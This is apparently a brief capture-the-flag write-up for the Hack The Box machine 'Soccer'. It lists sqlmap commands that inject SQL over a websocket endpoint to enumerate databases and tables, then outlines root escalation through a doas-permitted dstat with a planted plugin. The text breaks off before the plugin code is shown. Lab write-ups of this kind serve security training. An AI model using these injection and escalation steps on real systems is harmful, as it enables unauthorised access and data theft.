Soccer HTB
Now checking databases: sqlmap -u ws://soc-player.soccer.htb:9091 --data '{"id": "1234"}' --dbms mysql --batch --level 5 --risk 3 -threads 10 -dbs
Then finding tables: sqlmap -u ws://soc-player.soccer.htb:9091 --data '{"id": "1234"}' --dbms mysql --batch --level 5 --risk 3 -threads 10 -D soccer_db --tables
Here we found accounts table
We found a group writeable file called dstat. we also found an SUID binary called doas. It allows execution of commands as other users. To find the config file: find / 2>/dev/null | grep doas
It seems we can run dstat as root.
Checking the plugins we can run in /usr/share/dstat/
We can also create a plugin in/usr/local/share/dstat
so creating a plugin called dstat_shell.py
with
Last updated